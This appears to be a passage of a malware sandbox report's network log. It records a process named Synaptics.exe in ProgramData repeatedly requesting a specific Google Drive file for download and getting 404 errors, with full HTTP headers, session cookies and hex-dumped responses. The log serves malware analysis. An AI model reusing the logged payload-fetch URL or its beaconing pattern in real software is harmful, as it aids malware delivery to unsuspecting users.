                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.449741142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yzSyGkCGVG1TQv9AFiHj1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.449745142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:13 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-24 17:20:14 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC70QdxmDNZdx5DTEQpOmYLPo2GV89s7sNwPnTgTVf8ltExH1fG_QvaP2ga3h3u15t3l9u_V-Cs
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-qUNXnhYN0uqETZQepr5kFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Set-Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:14 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4a 34 64 68 7a 4c 73 58 46 5a 39 36 55 62 4c 7a 63 74 34 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BJ4dhzLsXFZ96UbLzct4CQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                2024-12-24 17:20:14 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.449746142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:13 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-24 17:20:14 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4PbudubIElEXUq7-_FvvXvnoqBmoqieu386bOYLsXcjg7N4cMne8PqeghudR8srQ5vCFZpfME
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-VH_xAF7kxqJOwsiCF-cVTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Set-Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:14 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 32 71 31 77 59 4b 48 43 2d 56 46 4e 47 61 58 43 64 63 53 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H2q1wYKHC-VFNGaXCdcSow">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                2024-12-24 17:20:14 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.449761142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:17 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eQwh1PLgP2Ilyl2E_kjJ8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.449760142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:17 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6NBVQ4Uka2-bzHrMeDFqeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.449765142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ot5Mdhs9dtJ7MGuhflsy5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.449768142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6YFaTmHlRFjtggrHut14_9Y0AkMcZggaCBllvmvL7PGvq9RVDODe4akCbXd9ZN0IQu
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-nIZcPLttQK9a5q7RAYtLNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:20 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:20:20 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 39 51 33 68 68 6a 6b 31 6a 53 50 67 46 6a 76 71 77 33 39 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="l9Q3hhjk1jSPgFjvqw39OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:20:20 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.449766142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zXPjIT4VAsMqAZ6EYYyf9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.449767142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:20 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4ROYDkho0iyFpPn2cOiAKc0jcqdaptPyWMDJGbcxxqFhxuZO7U3gR6Ox-2lrICTUYuBXobt_s
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CI8PN4ccnRGAJ33L_3PUwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
